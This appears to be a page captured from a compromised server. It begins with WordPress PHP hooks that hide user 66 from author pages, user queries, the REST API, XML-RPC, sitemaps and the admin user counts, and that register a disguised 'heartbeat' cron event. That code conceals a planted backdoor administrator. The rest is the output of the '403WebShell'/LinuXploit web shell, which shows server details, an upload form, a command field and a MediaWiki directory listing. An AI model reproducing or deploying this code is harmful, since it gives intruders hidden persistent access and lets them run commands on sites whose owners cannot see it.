add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/wiki/includes/specials/Hook/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
August 08 2025 16:37:55
www-data / www-data
0755
AddNewAccountHook.php
0.717 KB
December 05 2024 15:41:42
www-data / www-data
0644
AncientPagesQueryHook.php
0.667 KB
December 05 2024 15:41:42
www-data / www-data
0644
BeforeWelcomeCreationHook.php
0.813 KB
December 05 2024 15:41:42
www-data / www-data
0644
BlockIpCompleteHook.php
0.782 KB
December 05 2024 15:41:42
www-data / www-data
0644
BlockIpHook.php
0.762 KB
December 05 2024 15:41:42
www-data / www-data
0644
BookInformationHook.php
0.631 KB
December 05 2024 15:41:42
www-data / www-data
0644
ChangeUserGroupsHook.php
0.945 KB
December 05 2024 15:41:42
www-data / www-data
0644
ContribsPager__getQueryInfoHook.php
0.754 KB
December 05 2024 15:41:42
www-data / www-data
0644
ContribsPager__reallyDoQueryHook.php
0.98 KB
December 05 2024 15:41:42
www-data / www-data
0644
ContributionsLineEndingHook.php
1.025 KB
December 05 2024 15:41:42
www-data / www-data
0644
ContributionsToolLinksHook.php
0.965 KB
December 05 2024 15:41:42
www-data / www-data
0644
DeletedContribsPager__reallyDoQueryHook.php
1.058 KB
December 05 2024 15:41:42
www-data / www-data
0644
DeletedContributionsLineEndingHook.php
1.102 KB
December 05 2024 15:41:42
www-data / www-data
0644
EmailUserCCHook.php
0.731 KB
December 05 2024 15:41:42
www-data / www-data
0644
EmailUserCompleteHook.php
0.735 KB
December 05 2024 15:41:42
www-data / www-data
0644
EmailUserFormHook.php
0.547 KB
December 05 2024 15:41:42
www-data / www-data
0644
EmailUserHook.php
0.974 KB
December 05 2024 15:41:42
www-data / www-data
0644
EmailUserPermissionsErrorsHook.php
0.848 KB
December 05 2024 15:41:42
www-data / www-data
0644
ExtensionTypesHook.php
0.817 KB
December 05 2024 15:41:42
www-data / www-data
0644
FileUndeleteCompleteHook.php
0.794 KB
December 05 2024 15:41:42
www-data / www-data
0644
GetLogTypesOnUserHook.php
0.531 KB
December 05 2024 15:41:42
www-data / www-data
0644
ImportLogInterwikiLinkHook.php
0.695 KB
December 05 2024 15:41:42
www-data / www-data
0644
ImportSourcesHook.php
0.697 KB
December 05 2024 15:41:42
www-data / www-data
0644
LanguageSelectorHook.php
0.645 KB
December 05 2024 15:41:42
www-data / www-data
0644
LoginFormValidErrorMessagesHook.php
0.788 KB
December 05 2024 15:41:42
www-data / www-data
0644
LonelyPagesQueryHook.php
0.663 KB
December 05 2024 15:41:42
www-data / www-data
0644
NewPagesLineEndingHook.php
1.048 KB
December 05 2024 15:41:42
www-data / www-data
0644
OtherAutoblockLogLinkHook.php
0.692 KB
December 05 2024 15:41:42
www-data / www-data
0644
OtherBlockLogLinkHook.php
0.786 KB
December 05 2024 15:41:42
www-data / www-data
0644
PostLoginRedirectHook.php
1.103 KB
December 05 2024 15:41:42
www-data / www-data
0644
PreferencesGetLegendHook.php
0.79 KB
December 05 2024 15:41:42
www-data / www-data
0644
PrefsEmailAuditHook.php
0.687 KB
June 11 2025 23:35:17
www-data / www-data
0644
RandomPageQueryHook.php
0.715 KB
December 05 2024 15:41:42
www-data / www-data
0644
ShortPagesQueryHook.php
0.718 KB
December 05 2024 15:41:42
www-data / www-data
0644
SoftwareInfoHook.php
0.621 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialBlockModifyFormFieldsHook.php
0.654 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialContributionsBeforeMainOutputHook.php
0.947 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialContributions__formatRow__flagsHook.php
0.845 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialContributions__getForm__filtersHook.php
0.922 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialCreateAccountBenefitsHook.php
1.483 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialExportGetExtraPagesHook.php
0.685 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialListusersDefaultQueryHook.php
0.675 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialListusersFormatRowHook.php
0.672 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialListusersHeaderFormHook.php
0.66 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialListusersHeaderHook.php
0.647 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialListusersQueryInfoHook.php
0.662 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialLogAddLogSearchRelationsHook.php
0.763 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialMovepageAfterMoveHook.php
0.662 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialMuteModifyFormFieldsHook.php
0.677 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialNewPagesFiltersHook.php
0.813 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialNewpagesConditionsHook.php
1.032 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialPrefixIndexGetFormFiltersHook.php
0.705 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialPrefixIndexQueryHook.php
0.664 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialRandomGetRandomTitleHook.php
1.063 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialRecentChangesPanelHook.php
0.688 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialResetTokensTokensHook.php
0.695 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialSearchCreateLinkHook.php
0.695 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialSearchGoResultHook.php
1.027 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialSearchNogomatchHook.php
0.791 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialSearchProfilesHook.php
0.537 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialSearchResultsAppendHook.php
0.827 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialSearchResultsHook.php
0.715 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialSearchResultsPrependHook.php
0.908 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialSearchSetupEngineHook.php
0.688 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialStatsAddExtraHook.php
0.978 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialTrackingCategories__generateCatLinkHook.php
0.898 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialTrackingCategories__preprocessHook.php
0.835 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialUploadCompleteHook.php
0.576 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialVersionVersionUrlHook.php
0.64 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialWatchlistGetNonRevisionTypesHook.php
0.794 KB
December 05 2024 15:41:42
www-data / www-data
0644
SpecialWhatLinksHereQueryHook.php
0.907 KB
December 05 2024 15:41:42
www-data / www-data
0644
UnblockUserCompleteHook.php
0.708 KB
December 05 2024 15:41:42
www-data / www-data
0644
UnblockUserHook.php
0.782 KB
December 05 2024 15:41:42
www-data / www-data
0644
UndeleteForm__showHistoryHook.php
0.775 KB
June 11 2025 23:35:17
www-data / www-data
0644
UndeleteForm__showRevisionHook.php
0.777 KB
June 11 2025 23:35:17
www-data / www-data
0644
UploadFormInitDescriptorHook.php
0.587 KB
December 05 2024 15:41:42
www-data / www-data
0644
UploadFormSourceDescriptorsHook.php
0.743 KB
December 05 2024 15:41:42
www-data / www-data
0644
UploadForm_BeforeProcessingHook.php
0.896 KB
December 05 2024 15:41:42
www-data / www-data
0644
UploadForm_getInitialPageTextHook.php
0.803 KB
December 05 2024 15:41:42
www-data / www-data
0644
UploadForm_initialHook.php
0.77 KB
December 05 2024 15:41:42
www-data / www-data
0644
UserLoginCompleteHook.php
1.75 KB
December 05 2024 15:41:42
www-data / www-data
0644
UserLogoutCompleteHook.php
0.747 KB
December 05 2024 15:41:42
www-data / www-data
0644
UsersPagerDoBatchLookupsHook.php
1.145 KB
December 05 2024 15:41:42
www-data / www-data
0644
WantedPages__getQueryInfoHook.php
0.787 KB
December 05 2024 15:41:42
www-data / www-data
0644
WatchlistEditorBeforeFormRenderHook.php
0.744 KB
December 05 2024 15:41:42
www-data / www-data
0644
WatchlistEditorBuildRemoveLineHook.php
0.817 KB
June 11 2025 23:35:17
www-data / www-data
0644
WhatLinksHerePropsHook.php
0.811 KB
December 05 2024 15:41:42
www-data / www-data
0644

Youez - 2016 - github.com/yon3zu
LinuXploit